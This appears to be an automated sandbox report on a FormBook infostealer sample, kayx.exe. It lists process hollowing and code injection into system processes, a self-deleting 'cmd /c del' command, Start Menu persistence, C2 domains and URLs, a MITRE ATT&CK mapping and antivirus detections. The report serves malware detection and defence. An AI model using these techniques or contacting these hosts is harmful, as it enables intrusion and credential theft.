Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E48EC7 mov eax, dword ptr fs:[00000030h]	17_2_00E48EC7
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EBFEC0 mov eax, dword ptr fs:[00000030h]	17_2_00EBFEC0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E336CC mov eax, dword ptr fs:[00000030h]	17_2_00E336CC
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED8ED6 mov eax, dword ptr fs:[00000030h]	17_2_00ED8ED6
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h]	17_2_00ED0EA5
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h]	17_2_00ED0EA5
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h]	17_2_00ED0EA5
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E846A7 mov eax, dword ptr fs:[00000030h]	17_2_00E846A7
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E9FE87 mov eax, dword ptr fs:[00000030h]	17_2_00E9FE87
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E1766D mov eax, dword ptr fs:[00000030h]	17_2_00E1766D
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]	17_2_00E2AE73
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]	17_2_00E2AE73
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]	17_2_00E2AE73
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]	17_2_00E2AE73
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]	17_2_00E2AE73
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]	17_2_00E17E41
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]	17_2_00E17E41
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]	17_2_00E17E41
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]	17_2_00E17E41
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]	17_2_00E17E41
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]	17_2_00E17E41
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ECAE44 mov eax, dword ptr fs:[00000030h]	17_2_00ECAE44
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ECAE44 mov eax, dword ptr fs:[00000030h]	17_2_00ECAE44
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0E620 mov eax, dword ptr fs:[00000030h]	17_2_00E0E620
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EBFE3F mov eax, dword ptr fs:[00000030h]	17_2_00EBFE3F
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0C600 mov eax, dword ptr fs:[00000030h]	17_2_00E0C600
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0C600 mov eax, dword ptr fs:[00000030h]	17_2_00E0C600
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0C600 mov eax, dword ptr fs:[00000030h]	17_2_00E0C600
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E38E00 mov eax, dword ptr fs:[00000030h]	17_2_00E38E00
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC1608 mov eax, dword ptr fs:[00000030h]	17_2_00EC1608
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3A61C mov eax, dword ptr fs:[00000030h]	17_2_00E3A61C
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3A61C mov eax, dword ptr fs:[00000030h]	17_2_00E3A61C
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E437F5 mov eax, dword ptr fs:[00000030h]	17_2_00E437F5
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E18794 mov eax, dword ptr fs:[00000030h]	17_2_00E18794
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E87794 mov eax, dword ptr fs:[00000030h]	17_2_00E87794
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E87794 mov eax, dword ptr fs:[00000030h]	17_2_00E87794
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E87794 mov eax, dword ptr fs:[00000030h]	17_2_00E87794
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E1FF60 mov eax, dword ptr fs:[00000030h]	17_2_00E1FF60
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED8F6A mov eax, dword ptr fs:[00000030h]	17_2_00ED8F6A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E1EF40 mov eax, dword ptr fs:[00000030h]	17_2_00E1EF40
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E04F2E mov eax, dword ptr fs:[00000030h]	17_2_00E04F2E
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E04F2E mov eax, dword ptr fs:[00000030h]	17_2_00E04F2E
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3E730 mov eax, dword ptr fs:[00000030h]	17_2_00E3E730
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED070D mov eax, dword ptr fs:[00000030h]	17_2_00ED070D
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED070D mov eax, dword ptr fs:[00000030h]	17_2_00ED070D
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3A70E mov eax, dword ptr fs:[00000030h]	17_2_00E3A70E
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3A70E mov eax, dword ptr fs:[00000030h]	17_2_00E3A70E
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2F716 mov eax, dword ptr fs:[00000030h]	17_2_00E2F716
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E9FF10 mov eax, dword ptr fs:[00000030h]	17_2_00E9FF10
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E9FF10 mov eax, dword ptr fs:[00000030h]	17_2_00E9FF10

Source: C:\Users\user\Desktop\kayx.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\kayx.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 184.168.131.241 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.141 80			Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\kayx.exe

Memory written: C:\Users\user\Desktop\kayx.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\kayx.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\kayx.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Thread register set: target process: 3388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\kayx.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\kayx.exe

Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 3F0000

Jump to behavior

Source: C:\Users\user\Desktop\kayx.exe	Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe'	Jump to behavior

Source: explorer.exe, 00000012.00000002.482884776.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\kayx.exe	Queries volume information: C:\Users\user\Desktop\kayx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\kayx.exe

Code function: 1_2_05C4C920 GetUserNameA,

1_2_05C4C920

Source: C:\Users\user\Desktop\kayx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Registry Run Keys / Startup Folder11	Process Injection612	Masquerading1	Input Capture1	Query Registry1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder11	Virtualization/Sandbox Evasion3	LSASS Memory	Security Software Discovery321	Remote Desktop Protocol	Archive Collected Data11	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information11	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing13	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	File and Directory Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery112	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
kayx.exe	35%	Virustotal		Browse
kayx.exe	46%	ReversingLabs	ByteCode-MSIL.Infostealer.Maslog
kayx.exe	100%	Avira	TR/Dropper.MSIL.blecg
kayx.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	100%	Avira	TR/Dropper.MSIL.blecg
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	46%	ReversingLabs	ByteCode-MSIL.Infostealer.Maslog

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
17.2.kayx.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
17.1.kayx.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.jibenentreprenad.mobi/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
https://www.jiben.se/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.ghoster.agency/bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX	0%	Avira URL Cloud	safe
http://crl.v	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
jibenentreprenad.mobi	184.168.131.241	true	true	unknown
ext-sq.squarespace.com	198.185.159.141	true	false	high
www.jibenentreprenad.mobi	unknown	unknown	true	unknown
www.ghoster.agency	unknown	unknown	true	unknown
www.amtpsychology.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.jibenentreprenad.mobi/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX	true	Avira URL Cloud: safe	unknown
http://www.ghoster.agency/bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false		high
https://www.jiben.se/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb	mstsc.exe, 00000015.00000002.487573696.000000000543D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.v	explorer.exe, 00000012.00000000.377196648.000000000F640000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
184.168.131.241	unknown	United States		26496	AS-26496-GO-DADDY-COM-LLCUS	true
198.185.159.141	unknown	United States		53831	SQUARESPACEUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	321226
Start date:	20.11.2020
Start time:	16:30:50
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	kayx.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@14/3@4/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 24.8% (good quality ratio 23.3%) Quality average: 73.5% Quality standard deviation: 29.4%
HCA Information:	Successful, ratio: 97% Number of executed functions: 130 Number of non-executed functions: 136
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
